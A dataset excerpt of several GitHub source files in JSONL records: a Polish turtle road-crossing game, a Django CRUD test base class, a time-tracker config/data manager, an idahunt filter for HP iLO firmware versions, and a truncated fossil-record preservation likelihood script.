range(10):\n samochod = turtle.Turtle()\n samochod.shape(\"square\")\n kolor = random.choice(kolory_samochodow)\n samochod.color(kolor)\n samochod.penup()\n samochod.goto(random.randint(-szerokosc/2 + 20, szerokosc/2 - 20), random.randint(-wysokosc/2 + 50, wysokosc/2 - 50))\n samochody.append(samochod)\n\n# Wyświetlanie wyniku\nwynik = 0\nwynik_pen = turtle.Turtle()\nwynik_pen.color(\"white\")\nwynik_pen.penup()\nwynik_pen.goto(-szerokosc/2 + 10, wysokosc/2 - 40)\nwynik_pen.hideturtle()\n\n# Komunikat przegranej\nkomunikat = turtle.Turtle()\nkomunikat.color(\"white\")\nkomunikat.penup()\nkomunikat.goto(0, 0)\nkomunikat.hideturtle()\n\n# Funkcja do poruszania żółwiem\ndef idz_do_gory():\n y = zolw.ycor()\n y += 20\n zolw.sety(y)\n\n# Poruszanie żółwiem za pomocą klawiszy\nekran.listen()\nekran.onkeypress(idz_do_gory, \"Up\")\n\n# Efekt kolizji\ndef efekt_kolizji():\n zolw.color(\"red\")\n ekran.update()\n tk.messagebox.showinfo(\"PRZEGRAŁEŚ\", \"Koniec gry\")\n zolw.color(\"white\")\n\n# Główna pętla gry\nwhile True:\n ekran.update()\n\n # Poruszanie samochodami\n for samochod in samochody:\n x = samochod.xcor()\n x -= predkosc_samochodu\n samochod.setx(x)\n\n # Sprawdzenie kolizji\n if zolw.distance(samochod) < 20:\n efekt_kolizji()\n komunikat.write(\"PRZEGRAŁEŚ\", align=\"center\", font=(\"Arial\", 24, \"bold\"))\n ekran.update()\n time.sleep(2)\n komunikat.clear()\n zolw.goto(0, -wysokosc/2 + 30)\n predkosc_samochodu = 5\n wynik = 0\n wynik_pen.clear()\n wynik_pen.write(\"Wynik: {}\".format(wynik), align=\"left\", font=(\"Arial\", 16, \"normal\"))\n\n # Sprawdzenie, czy żółw przeszedł przez drogę\n if zolw.ycor() > wysokosc/2 - 20:\n zolw.goto(0, -wysokosc/2 + 30)\n wynik += 1\n wynik_pen.clear()\n wynik_pen.write(\"Wynik: {}\".format(wynik), align=\"left\", font=(\"Arial\", 16, \"normal\"))\n\n # Sprawdzenie, czy samochody dotarły do lewej krawędzi ekranu\n for samochod in samochody:\n if samochod.xcor() < -szerokosc/2:\n samochod.goto(random.randint(szerokosc/2 - 20, szerokosc/2 - 20), random.randint(-wysokosc/2 + 50, wysokosc/2 - 50))\n predkosc_samochodu += 1\n\n # Tworzenie przycisku \"Koniec\"\n przycisk_koniec = tk.Button(text=\"Koniec\", command=ekran.bye)\n przycisk_koniec_window = ekran.getcanvas().create_window(szerokosc/2 - 50, wysokosc/2 - 50, window=przycisk_koniec)\n","repo_name":"sjemon17/lol","sub_path":"zolw.py","file_name":"zolw.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"6208548325","text":"# -*- coding: ISO-8859-1 -*-\r\n\"\"\"\r\nTeste base para ser herdado por todos os testes padrões\r\n\"\"\"\r\nfrom django.test import TestCase, Client\r\nfrom django.contrib.contenttypes.models import ContentType\r\nfrom django.contrib.auth.models import Permission\r\n\r\nfrom onyxlog.acesso.models.usuario import Usuario\r\nfrom model_mommy import mommy\r\n\r\nclass Testsbase(TestCase):\r\n modelStandard = None\r\n urlBase = None\r\n fieldTestRender = None\r\n dataInsert = None\r\n modelPost = None\r\n modelRow = None\r\n modelMommy = None\r\n \r\n def setUp(self):\r\n self.data = {\r\n 'username' : 'testuser',\r\n 'senha' : 'testpass',\r\n 'email' : 'test@test.com'\r\n }\r\n self.user = Usuario.objects.create_user(self.data['username'], self.data['email'], self.data['senha'])\r\n self.client.login(username=self.data['username'], password=self.data['senha'])\r\n\r\n def test_permissions(self):\r\n \"\"\"\r\n Testa se valida permissoes de acesso\r\n \"\"\"\r\n if not self.urlBase is None:\r\n #Teste de insert\r\n response = self.client.get(self.urlBase+'formulario/')\r\n self.assertEquals(response.status_code, 403)\r\n\r\n #Cria dados\r\n self.prepare_to_post('test_permissions')\r\n\r\n #Teste de update\r\n response = self.client.post(self.urlBase+str(self.modelRow.id)+'/', self.modelPost)\r\n self.assertEquals(response.status_code, 403)\r\n\r\n #Teste de delete\r\n response = self.client.post(self.urlBase+'remove/'+str(self.modelRow.id)+'/',{})\r\n self.assertEquals(response.status_code, 403)\r\n\r\n def addPermissions(self):\r\n \"\"\"\r\n Adiciona permissoes ao usuario\r\n \"\"\"\r\n #busca tabela de models\r\n if not self.modelStandard is None:\r\n model = self.modelStandard()\r\n contentItem = ContentType.objects.get(app_label=model._meta.app_label,model=model.__class__.__name__.lower())\r\n #busca permissoes do model\r\n if not contentItem:\r\n self.assertTrue(False)\r\n\r\n permissions = Permission.objects.all().filter(content_type=contentItem.id)\r\n \r\n for permission in permissions:\r\n self.user.user_permissions.add(permission)\r\n\r\n def test_render_listpage(self):\r\n \"\"\"\r\n Testa renderização da página de lista\r\n \"\"\"\r\n # Faz chamada da pagina\r\n if not self.urlBase is None:\r\n response = self.client.get(self.urlBase)\r\n self.assertEquals(response.status_code, 200)\r\n\r\n def test_return_data_to_list(self):\r\n \"\"\"\r\n Testa retorno de dados em json\r\n \"\"\"\r\n # Faz chamada da pagina\r\n if not self.urlBase is None:\r\n response = self.client.get(self.urlBase+'data/')\r\n self.assertContains(response, '\"result\": \"ok\"', status_code=200)\r\n\r\n def prepare_to_post(self, fromDef):\r\n \"\"\"\r\n Prepara dados para testar post\r\n \"\"\"\r\n if fromDef == 'test_insert':\r\n self.modelPost = self.dataInsert\r\n else:\r\n self.modelRow = mommy.make(self.modelMommy)\r\n self.modelPost = self.dataInsert\r\n\r\n def test_insert(self):\r\n \"\"\"\r\n Testa renderização do formulário para iniclusão\r\n \"\"\"\r\n self.addPermissions()\r\n # Faz chamada da pagina\r\n if not self.urlBase is None:\r\n response = self.client.get(self.urlBase+'formulario/')\r\n self.assertEquals(response.status_code, 200)\r\n self.assertContains(response, 'name=\"'+self.fieldTestRender+'\"', status_code=200)\r\n\r\n \"\"\"\r\n Testa gravação dos dados no post de inclusão\r\n \"\"\"\r\n \r\n # Faz chamada da pagina\r\n if not self.urlBase is None:\r\n self.prepare_to_post('test_insert')\r\n response = self.client.post(self.urlBase+'formulario/', self.modelPost)\r\n self.assertContains(response, '\"success\": true', status_code=200)\r\n\r\n def test_update(self):\r\n \"\"\"\r\n Testa post do formulário de edição\r\n \"\"\"\r\n \r\n # Faz chamada da pagina\r\n if not self.urlBase is None:\r\n self.addPermissions()\r\n self.prepare_to_post('test_update')\r\n response = self.client.post(self.urlBase+str(self.modelRow.id)+'/', self.modelPost)\r\n self.assertContains(response, '\"success\": true', status_code=200)\r\n\r\n def test_delete(self):\r\n \"\"\"\r\n Testa delete\r\n \"\"\"\r\n # Faz chamada da pagina\r\n if not self.urlBase is None:\r\n self.addPermissions()\r\n self.prepare_to_post('test_delete')\r\n\r\n if not self.modelRow:\r\n self.assertTrue(False)\r\n\r\n totalBefore = self.modelStandard.objects.count()\r\n response = self.client.post(self.urlBase+'remove/'+str(self.modelRow.id)+'/',{})\r\n totalUpdated = self.modelStandard.objects.count()\r\n \r\n self.assertEquals(response.status_code, 200)\r\n self.assertTrue(totalBefore > totalUpdated)","repo_name":"jairvercosa/onyxlog","sub_path":"onyxlog/core/base/core_base_test.py","file_name":"core_base_test.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"40636634368","text":"import csv\nimport json\nimport os\nimport os.path\nfrom datetime import timedelta\nimport pprint\n\nfrom date_point import DatePoint, Timeframe\n\nclass DataManager:\n \"\"\"Wraps the mechanism for persisting and querying work dates and times\n\n The main features of this program rely on storage of dates and times during\n which personal project work has take place. The actual mechanism for\n storing this data is abstracted from the rest of the program. Here it is\n a simple `csv` file, with 'frozen' DatePoints stored in it.\n \"\"\"\n def __init__(self, config, path, data_file):\n self.data_filepath = os.path.join(path, data_file)\n self.config = config\n self._date_list = None\n self._file_modified = True\n\n @classmethod\n def default(cls):\n \"\"\"Return the default init arguments to be passed in by Config\"\"\"\n return {'data_file': 'data.csv'}\n\n @classmethod\n def setup(cls, path, data_file, **kwargs):\n \"\"\"Perform the necessary initial setup for the data\n\n Currently just makes the data file (a csv)\n \"\"\"\n data_filepath = os.path.join(path, data_file)\n if not os.path.isfile(data_filepath):\n with open(data_filepath, 'w'):\n pass\n\n def add_date(self, date):\n \"\"\"Append a new DatePoint to the date list\"\"\"\n with open(self.data_filepath, 'a', newline='') as writef:\n writer = csv.writer(writef)\n writer.writerow([date.freeze()])\n self._file_modified = True\n\n @property\n def date_list(self):\n \"\"\"Get the list of DatePoints this manager stores\"\"\"\n if self._date_list is None or self._file_modified:\n with open(self.data_filepath, 'r', newline='') as reader:\n reader = csv.reader(reader)\n self._date_list = [DatePoint.unfreeze(date[0]) for date in reader]\n self._file_modified = False\n return self._date_list\n\n def save(self):\n \"\"\"Persist any data that may have changed during runtime\n\n Since `add_data` is the only mutating method and it persists the data,\n this doesn't need to do anything (as of yet).\n \"\"\"\n pass\n\nclass CacheManager:\n \"\"\"Manager for cached data, i.e. calculated/temporary data\n\n Not used extensively in `Project`, however will become more relevant as\n more extensive statistics/information is made available.\n \"\"\"\n def __init__(self, config, cache_filename, path):\n \"\"\"Create a new cache manager from the filepath\"\"\"\n self.config = config\n self.cache_path = os.path.join(path, cache_filename)\n self._cache = None\n\n @property\n def cache(self):\n \"\"\"Lazy loading of the cache data\"\"\"\n if self._cache is None:\n with open(self.cache_path, 'r') as cache_file:\n self._cache = json.load(cache_file)\n return self._cache\n\n @classmethod\n def default(cls):\n \"\"\"Return the default init arguments to be passed in by Config\"\"\"\n return {'cache_filename': 'cache.json'}\n\n @classmethod\n def setup(cls, path, cache_filename, **kwargs):\n \"\"\"Perform the necessary initial setup for the data\n\n Makes the cache file and initializes the used values to None\n \"\"\"\n cache_filepath = os.path.join(path, cache_filename)\n if not os.path.isfile(cache_filepath):\n with open(cache_filepath, 'w') as cache_file:\n json.dump({'start_time': None}, cache_file)\n\n @property\n def start_time(self):\n \"\"\"Get the start time of the current timerange (if it exists)\"\"\"\n start_time = self.cache.get('start_time')\n if start_time is not None:\n return DatePoint.unfreeze(start_time)\n\n @start_time.setter\n def start_time(self, value):\n \"\"\"Set the start time for a new timerange\"\"\"\n if value is not None:\n value = value.freeze()\n self.cache['start_time'] = value\n\n def save(self):\n \"\"\"Persist any data that may have changed during runtime\"\"\"\n if self._cache is not None:\n with open(self.cache_path, 'w') as cache_file:\n json.dump(self._cache, cache_file)\n\nclass ConfigLocations:\n \"\"\"Enum for the different types of places config can be stored\"\"\"\n config = 'config' # global config, i.e. in ~/.config\n local = 'local' # local to a specific directory, so /some/path/.project\n env = 'env' # a specific global location given by an environment variable\n\n\nclass ConfigManager:\n \"\"\"Manager for the configuration of this project\n\n Abstraction for a persistent configuration. Saves the filepaths of the\n other necessary files as well. Currently the 'bootstrap' point, i.e. a path\n to this file is necessary to find or create the rest of the data. This will\n later be used to store more user-specific config as functionality is\n expanded.\n \"\"\"\n\n # directory name to use when making a config dir inside the current dir\n LOCAL_DIRNAME = '.project'\n # environment variable to check for a user-specified config location\n ENVIRONMENT_OVERRIDE = 'PROJECT_TRACKER_HOME'\n # directory name for a \"global\" config in a single location\n GLOBAL_DIRNAME = 'project'\n # config directory to put the global config into (currently ~/.config)\n DEFAULT_GLOBAL_LOCATION = os.path.expanduser('~/.config')\n # full path for a global config folder\n GLOBAL_DIRPATH = os.path.join(DEFAULT_GLOBAL_LOCATION, GLOBAL_DIRNAME)\n # directory to keep the cache in\n CACHE_DIRNAME = 'cache'\n # directory to keep the data in\n DATA_DIRNAME = 'data'\n # filename for the actual config file\n CONFIG_FILENAME = 'project.config'\n\n def __init__(self, data_config, cache_config, timeframe=None,\n finished_threshold=None):\n \"\"\"Create a new config manager, checking all the default locations\n\n This uses the `_config_location` class method to try to find an\n existing config location. If no such location exists, or if the data\n there is unreadable, raises an error. Otherwise also initializes the\n data and cache with the init data they store into config (on setup\n or during normal running).\n \"\"\"\n self.config_dirpath, self.location_type = self._config_location()\n self.config_filepath = self._config_filepath()\n if timeframe is None:\n timeframe = Timeframe.day\n self.timeframe = timeframe\n if finished_threshold is None:\n finished_threshold = timedelta(hours=1)\n self.finished_threshold = finished_threshold\n self._data_config = data_config\n self._cache_config = cache_config\n self.data = DataManager(self, **data_config)\n self.cache = CacheManager(self, **cache_config)\n\n @classmethod\n def to_dict(cls, data_config=None, cache_config=None, timeframe=None,\n threshold=None):\n config_dict = {}\n if data_config is not None:\n config_dict['data'] = data_config\n if cache_config is not None:\n config_dict['cache'] = cache_config\n if timeframe is not None:\n config_dict['timeframe'] = timeframe\n if threshold is not None:\n config_dict['finished_threshold'] = threshold\n return config_dict\n\n @classmethod\n def default(cls):\n return {\n 'timeframe': Timeframe.day,\n 'finished_threshold': 3600\n }\n\n def freeze(self):\n return self.to_dict(self._data_config,\n self._cache_config,\n self.timeframe,\n self.finished_threshold.total_seconds())\n\n @classmethod\n def unfreeze(cls, frozen):\n \"\"\"Initialize from a frozen dict\"\"\"\n timeframe = frozen.get('timeframe')\n finished_threshold = frozen.get('finished_threshold')\n if finished_threshold is not None:\n finished_threshold = timedelta(seconds=finished_threshold)\n # if there's no data or cache config an error has occurred\n data_config = frozen['data']\n cache_config = frozen['cache']\n return cls(data_config,\n cache_config,\n timeframe,\n finished_threshold)\n\n @classmethod\n def from_file(cls):\n dirpath = cls._config_location()\n filepath = cls._config_filepath()\n try:\n with open(filepath, 'r') as config_file:\n result = json.load(config_file)\n if result is None:\n raise ValueError('Invalid config')\n return result\n except json.decoder.JSONDecodeError:\n raise ValueError('Invalid config')\n\n @classmethod\n def find_config(cls):\n config = cls.from_file()\n return cls.unfreeze(config)\n\n @classmethod\n def save_dict(cls, config_dict):\n filepath = cls._config_filepath()\n with open(filepath, 'r') as config_file:\n contents_dict = json.load(config_file)\n if contents_dict != config_dict:\n print('WARNING: overwriting changed data!')\n print('Pre-overwrite file state:')\n pprint.pprint(contents_dict)\n print('Overwriting with:')\n pprint.pprint(config_dict)\n with open(filepath, 'w') as config_file:\n json.dump(config_dict, config_file)\n\n @classmethod\n def merge_config(cls, config_dict):\n with open(cls._config_filepath(), 'r') as config_file:\n old_config = json.load(config_file)\n old_config.update(config_dict)\n cls.save_dict(old_config)\n\n def save(self):\n self.save_dict(self.freeze())\n self.data.save()\n self.cache.save()\n\n @classmethod\n def configure(cls, data_config=None, cache_config=None,\n timeframe=None, threshold=None):\n config_dict = cls.to_dict(data_config, cache_config, timeframe, threshold)\n if not os.path.isfile(cls._config_filepath()):\n with open(cls._config_filepath(), 'w') as config_file:\n json.dump(config_dict, config_file)\n else:\n cls.merge_config(config_dict)\n\n @classmethod\n def _find_local(cls):\n current_dir = os.path.expanduser(os.getcwd())\n local_dir = os.path.join(current_dir, cls.LOCAL_DIRNAME)\n if os.path.isdir(local_dir):\n return os.path.realpath(local_dir)\n else:\n while (not os.path.isdir(local_dir) and\n current_dir != os.path.dirname(current_dir)):\n current_dir = os.path.dirname(current_dir)\n local_dir = os.path.join(current_dir, cls.LOCAL_DIRNAME)\n if os.path.isdir(local_dir):\n return (os.path.realpath(local_dir), ConfigLocations.local)\n\n @classmethod\n def _find_global(cls):\n if os.path.isdir(cls.GLOBAL_DIRPATH):\n return os.path.realpath(cls.GLOBAL_DIRPATH)\n\n @classmethod\n def _find_env(cls):\n path = os.environ.get(cls.ENVIRONMENT_OVERRIDE)\n if path is not None and os.path.isdir(path):\n return os.path.realpath(path)\n\n @classmethod\n def _config_location(cls):\n \"\"\"Check and return possible config locations in preference order\n\n Tries to look at local, then environment-variable set, then default\n global config locations. If none are found raises an error.\n \"\"\"\n local = cls._find_local()\n if local is not None:\n return local, ConfigLocations.local\n global_path = cls._find_global()\n if global_path is not None:\n return global_path, ConfigLocations.config\n env = cls._find_env()\n if env is not None:\n return env, ConfigLocations.env\n raise FileNotFoundError(\"Can't find config files\")\n\n @classmethod\n def _config_dirpath(cls):\n return cls._config_location()[0]\n\n @classmethod\n def _config_location_type(cls):\n return cls._config_location()[1]\n\n @classmethod\n def _config_filepath(cls):\n return os.path.join(cls._config_dirpath(), cls.CONFIG_FILENAME)\n\n @classmethod\n def validate(cls, config_location):\n \"\"\"Check that a config location was correctly set up\n\n Not currently in use, needs slightly more thought and implementations\n in Cache and Data.\n \"\"\"\n if not os.path.isdir(config_location):\n return False\n config_path = os.path.join(config_location, cls.CONFIG_FILENAME)\n if not os.path.isfile(config_path):\n return False\n cache_dir = os.path.join(config_location, cls.CACHE_DIRNAME)\n if not os.path.isdir(cache_dir):\n return False\n if not CacheManager.validate(cache_dir):\n return False\n data_path = os.path.join(config_location, cls.DATA_DIRNAME)\n if not os.path.isdir(cache_dir):\n return False\n if not DataManager.validate(data_path):\n return False\n\n @classmethod\n def create_config_location(cls, config_location_type,\n make_intermediate=True, dir_path=None):\n \"\"\"Make the directory required for certain config locations\"\"\"\n makedir = os.makedirs if make_intermediate else os.mkdir\n if config_location_type == ConfigLocations.local:\n makedir(os.path.join(dir_path, cls.LOCAL_DIRNAME))\n elif config_location_type == ConfigLocations.env:\n if env_path is not None:\n makedir(env_path)\n else:\n raise ValueError('Must give env_path for env config type')\n elif config_location_type == ConfigLocations.config:\n makedir(cls.GLOBAL_DIRPATH)\n\n @classmethod\n def setup(cls, config_location_type=None, filepath=None):\n \"\"\"Set up the file structures required to run from scratch\n\n Can be given a type of config location to set up. Does not\n currently overwrite existing files. Not overwriting may cause\n some issues, as proper validation is not yet done so this could\n leave incomplete structures untouched. However it prevents data\n loss until more complete validation is completed.\n\n This ensures a 'config location' based on the argument exists.\n Then inside it it creates a file structure consisting of a\n config file, a cache folder, and a data folder. Data and Cache\n setups are called on their respective folders. The default\n initialization arguments for Data and Cache are stored in the\n config file. These arguments are meant to potentially be\n modified by Data and Cache as needed and effectively act as a\n \"data store\" for them.\n \"\"\"\n if config_location_type is None:\n config_location_type = ConfigLocations.config\n try:\n config_dir = cls._config_dirpath()\n if cls._config_location_type() != config_location_type:\n raise FileNotFoundError()\n except FileNotFoundError:\n cls.create_config_location(config_location_type, dir_path=filepath)\n config_dir = cls._config_dirpath()\n config_filepath = cls._config_filepath()\n if os.path.isfile(config_filepath):\n try:\n with open(config_filepath, 'r') as config_file:\n config = json.load(config_file)\n data_init = config['data']\n cache_init = config['cache']\n except (json.decoder.JSONDecodeError, KeyError):\n print('Invalid config found. Not overwriting.')\n return\n else:\n data_init = DataManager.default()\n cache_init = CacheManager.default()\n data_path = os.path.join(config_dir, cls.DATA_DIRNAME)\n cache_path = os.path.join(config_dir, cls.CACHE_DIRNAME)\n if not os.path.isdir(cache_path):\n os.mkdir(cache_path)\n if not os.path.isdir(data_path):\n os.mkdir(data_path)\n cache_init['path'] = cache_path\n data_init['path'] = data_path\n\n cls.configure(data_init, cache_init)\n DataManager.setup(**data_init)\n CacheManager.setup(**cache_init)\n","repo_name":"spruceb/strk","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":16317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30042039716","text":"#!/usr/bin/python3\r\n#\r\n# This file is part of idahunt.\r\n# Copyright (c) 2018, Aaron Adams <aaron.adams(at)nccgroup(dot)trust>\r\n# Copyright (c) 2018, Cedric Halbronn <cedric.halbronn(at)nccgroup(dot)trust>\r\n#\r\n# Filter for HP iLO servers to be used by idahunt.py command line:\r\n# e.g. idahunt.py --filter \"filters/hpilo.py -m 244 -M 250 -i 4 -I 4 -v -n .webserv.elf.text\"\r\n\r\nimport argparse\r\nimport os\r\nimport re\r\nimport sys\r\nimport subprocess\r\nimport time\r\n\r\ndef logmsg(s, end=None, debug=True):\r\n if not debug:\r\n return\r\n if type(s) == str:\r\n if end != None:\r\n print(\"[hpilo] \" + s),\r\n else:\r\n print(\"[hpilo] \" + s)\r\n else:\r\n print(s)\r\n\r\n# parse the version from the firmware name\r\n# examples: ilo4_250.bin\r\ndef build_version(dirname):\r\n match = re.search(r'ilo([^\\\\/.]+)_([^\\\\/.]+)\\.bin', dirname)\r\n if not match:\r\n logmsg(\"Could not find the iloXXX.bin in string: %s\" % dirname)\r\n return '', ''\r\n\r\n ilo_version = match.group(1)\r\n release_version = match.group(2)\r\n return ilo_version, release_version\r\n\r\n# do we actually treat it?\r\ndef filter(f, min_ilo, max_ilo, min, max, name, verbose):\r\n # Check hardcoded whitelist as a sanity check\r\n # We expect something like \".webserv.elf.text\"\r\n if \".text\" not in os.path.basename(f) and \".RO\" not in os.path.basename(f):\r\n #logmsg(\"Skipping unrecognized file: %s\" % os.path.basename(f))\r\n return None\r\n # Check user-specified whitelist\r\n if name and name != os.path.basename(f):\r\n logmsg(\"Skipping wrong filename: %s\" % f, debug=verbose)\r\n return None\r\n ilo_version, release_version = build_version(f)\r\n if ilo_version == None or len(ilo_version) == 0 or release_version == None or len(release_version) == 0:\r\n return None\r\n if max != None and release_version > max:\r\n logmsg(\"Skipping release version too high: %s\" % f, debug=verbose)\r\n return None\r\n if min != None and release_version < min:\r\n logmsg(\"Skipping release version too low: %s\" % f, debug=verbose)\r\n return None\r\n if max != None and ilo_version > max_ilo:\r\n logmsg(\"Skipping iLO version too high: %s\" % f, debug=verbose)\r\n return None\r\n if min != None and ilo_version < min_ilo:\r\n logmsg(\"Skipping iLO version too low: %s\" % f, debug=verbose)\r\n return None\r\n\r\n # all iLOs are 32-bit ARM atm\r\n arch_ = 32\r\n return f, arch_\r\n\r\ndef main(f, cmdline):\r\n # We override sys.argv so argparse can parse our arguments :)\r\n sys.argv = cmdline.split()\r\n\r\n parser = argparse.ArgumentParser(prog=cmdline)\r\n parser.add_argument('-i', dest='minimum_ilo', default=None, help='Minimum \\\r\n iLO version to include in the analysis (eg: 4 for iLO4)')\r\n parser.add_argument('-I', dest='maximum_ilo', default=None, help='Maximum \\\r\n iLO version to include in the analysis (eg: 5 for iLO 5)')\r\n parser.add_argument('-m', dest='minimum', default=None, help='Minimum \\\r\n version to include in the analysis \\\r\n (eg: 244 for ilo4_244.bin)')\r\n parser.add_argument('-M', dest='maximum', default=None, help='Maximum \\\r\n version to include in the analysis (eg: 250 for ilo4_250.bin)')\r\n parser.add_argument('-n', dest='name', default=None, help='Restrict to \\\r\n a given name (eg: .webserv.elf.text)')\r\n parser.add_argument('-v', dest='verbose', default=False, action='store_true'\r\n , help='be more verbose to debug script')\r\n args = parser.parse_args()\r\n\r\n return filter(f, args.minimum_ilo, args.maximum_ilo, args.minimum, args.maximum, args.name,\r\n args.verbose)\r\n","repo_name":"nccgroup/idahunt","sub_path":"filters/hpilo.py","file_name":"hpilo.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":324,"dataset":"github-code","pt":"57"} +{"seq_id":"35461066374","text":"#!/usr/bin/env python \nfrom numpy import *\nimport numpy as np\nimport scipy.stats\nnp.set_printoptions(suppress=True) # prints floats, no scientific notation\nnp.set_printoptions(precision=3) # rounds all array elements to 3rd digit\nfrom scipy.special import beta as f_beta\nfrom scipy.optimize import fmin_powell as Fopt # fmin\nfrom scipy.special import betainc\nimport csv,os, argparse,sys\n\n\ndef NHPP_lik(x,q,s,e):\n k=len(x[x>0]) # no. fossils for species i\n xB1= -(x-s) # distance fossil-ts\n c=.5\n C=s-c*(s-e)\n a = 1+ (4*(C-e))/(s-e)\n b = 1+ (4*(-C+s))/(s-e)\n lik = -q*(s-e) + np.sum(logPERT4_density(s,e,a,b,x)+np.log(q)) - np.log(1-np.exp(-q*(s-e)))\n #lik = -q*(s-e) + sum(logPERT4_density(s,e,a,b,x)+log(q))+log(s-e) - log(1-exp(-q*(s-e)))\n lik += -np.sum(np.log(np.arange(1,k+1)))\n return lik\n\ndef logPERT4_density(s,e,a,b,x): # relative 'stretched' LOG-PERT density: PERT4 * (s-e)\n #return log((s-x)**(b-1) * (-e+x)**(a-1)) - log ((s-e)**4 * f_beta(a,b))\n return np.log(s-x)*(b-1) + np.log(-e+x)*(a-1) - (np.log(s-e)*4 + np.log(f_beta(a,b)))\n\n### ML OPT SE\ndef optim_se_given_q_HPP(x,q,exp_se=0):\n # USE EXPECTED s,e: \n if exp_se==1:\n s,e =np.max(x)+1./q,np.min(x)-1./q\n else:\n s,e =np.max(x),np.min(x)\n if e<0: e= 0.00000001\n k=len(x[x>0]) # no. fossils for species i\n lik= -q*(s-e) + np.log(q)*k - np.sum(np.log(np.arange(1,k+1))) - np.log(1-np.exp(-q*(s-e)))\n return [lik,s,e]\n\ndef optim_se_given_q_NHPP(x,q): \n def NHPP_lik_ML(se):\n s=np.abs(se[0])+np.max(x)\n e=np.maximum(np.min(x)-np.abs(se[1]), 0.0001) # avoid extinction in the future\n k=len(x[x>0]) # no. fossils for species i\n c=.5\n C=s-c*(s-e)\n a = 1+ (4*(C-e))/(s-e)\n b = 1+ (4*(-C+s))/(s-e)\n lik1 = -q*(s-e) \n lik2 = np.sum(logPERT4_density(s,e,a,b,x)+np.log(q))\n lik3 = - np.log(1-np.exp(-q*(s-e)))\n lik = lik1+lik2+lik3 -np.sum(np.log(np.arange(1,k+1)))\n return -lik \n se0 = [0.1*np.max(x), np.min(x)-0.1]\n optValues =Fopt(NHPP_lik_ML, se0, full_output=1, disp=0)\n params=np.abs(np.array(optValues[0]))\n lik= -(optValues[1])\n s = params[0]+max(x)\n e = np.min(x)-params[1]\n return [lik,s,e]\n\ndef exp_tpp(q,q_shift): # expected value under a multi-Exp distributio\n q_shift=np.sort(list(q_shift)+[0,np.inf])\n pdf_sample = []\n tot_samples = 10000\n for i in range(len(q)):\n r = np.random.exponential(1./q[i],tot_samples)\n temp= r[r<(q_shift[i+1]-q_shift[i])]\n #print q_shift[i+1]-q_shift[i]\n pdf_sample += list(temp+q_shift[i])\n tot_samples -= len(temp)\n return np.mean(pdf_sample)\n\ndef optim_se_given_q_TPP(x,q,occs_sp_bin_i,times_q_shift=[np.inf,0],exp_se=0):\n fa,la=np.max(x),np.min(x)\n # USE EXPECTED s,e\n if exp_se==1:\n # speciation time\n qS_ts = times_q_shift[times_q_shift>=fa]\n if len(qS_ts)==1: # no shift prior to max(x)\n s = fa + 1./q[0]\n else:\n q_rates_prior_fa = q[0:(len(qS_ts))]\n #print \"q_rates_prior_fa\",q_rates_prior_fa[::-1], (qS_ts-fa)[::-1]\n s = fa + exp_tpp(q_rates_prior_fa[::-1], (qS_ts-fa)[::-1])\n # extinction time\n qS_te = times_q_shift[times_q_shift<=la]\n if len(qS_te)==1: # no shift prior to max(x)\n e = la - 1./q[len(q)-1]\n else:\n q_rates_post_la = q[len(q)-len(qS_te):len(q)]\n #print \"q_rates_post_la\",q_rates_post_la,la-qS_te\n e = la - exp_tpp(q_rates_post_la,la-qS_te)\n else:\n s,e =fa,la\n if e<0: e= 0.00000001\n k=len(x[x>0]) # no. fossils for species i \n k_vec = occs_sp_bin_i # no. occurrences per time bin per species\n # e.g. k_vec = [0,0,1,12.,3,0]\n h = np.histogram(np.array([s,e]),bins=np.sort(times_q_shift))[0][::-1]\n ind_tste= (h).nonzero()[0]\n #print \"\\n\\n\\nHIST\",ind_tste, np.array([s,e]),sort(times_q_shift)\n #print k_vec\n #quit()\n ind_min=np.min(ind_tste)\n ind_max=np.max(ind_tste)\n ind=np.arange(len(times_q_shift))\n ind = ind[ind_min:(ind_max+1)] # indexes of time frames where lineage is present\n # calc time lived in each time frame\n t = times_q_shift[times_q_shift<s]\n t = t[t>e]\n t2 = np.array([s]+list(t)+[e])\n d = np.abs(np.diff(t2))\n \n q_rates=q\n \n lik = np.sum(-q_rates[ind]*d + np.log(q_rates[ind])*k_vec[ind]) - np.log(1-np.exp(np.sum(-q_rates[ind]*d))) -np.sum(np.log(np.arange(1,np.sum(k_vec)+1))) \n #print [lik,s,e,max(x),min(x)]\n #print lik,s,e, x, i\n #quit()\n return [lik,s,e]\n\ndef range01(x, m=0, r=1):\n temp = (x-np.min(x))/(np.max(x)-np.min(x))\n temp = temp*r\n temp = temp+m\n return temp\n\ndef est_s_e_q(fossil_complete,occs_sp_bin,model=0,exp_se=0,q_shift_times=[],q0_init=[]):\n def calc_tot_lik_given_q(q_arg):\n q=np.abs(q_arg[0])\n ml_est = []\n i=0\n for x in fossil_complete: # loop over species\n if model==0:\n ml_est.append(optim_se_given_q_HPP(x,q,exp_se))\n elif model==1:\n ml_est.append(optim_se_given_q_NHPP(x,q))\n elif model==2:\n ml_est.append(optim_se_given_q_TPP(x,np.abs(np.array(q_arg)),occs_sp_bin[i],q_shift_times,exp_se))\n i+=1\n ml_est = np.array(ml_est)\n tot_lik = np.sum(ml_est[:,0])\n return -tot_lik\n \n q0 = [1.1]\n if model==2: \n if len(q0_init)> 0: q0 =q0_init\n else: q0= np.ones(len(q_shift_times)-1)\n #print q0\n optValues =Fopt(calc_tot_lik_given_q, q0, full_output=1, disp=0)\n try:\n if len(optValues[0]):\n params=np.abs(np.array(optValues[0]))\n except:\n params = np.abs(np.array([optValues[0]]))\n lik= - optValues[1]\n return [lik, params]\n\ndef calcAICc(lik,df,s):\n AIC = 2*df-2*lik \n den = (s - df -1)\n if np.min(den) <= 0:\n print(\"Using AIC as AICc won't allow for n. parameters > sample size\")\n return AIC, 0\n else:\n return AIC + (2 * df**2 + 2*df) / den, 1\n\ndef run_model_testing(Xdata,q_shift=0,min_n_fossils=2,verbose=1):\n # data are shifted by 100\n fossil_complete=[Xdata[i]+0 for i in range(len(Xdata)) if np.min(Xdata[i])>0 and len(Xdata[i])>=min_n_fossils] # remove extant, and few occs\n 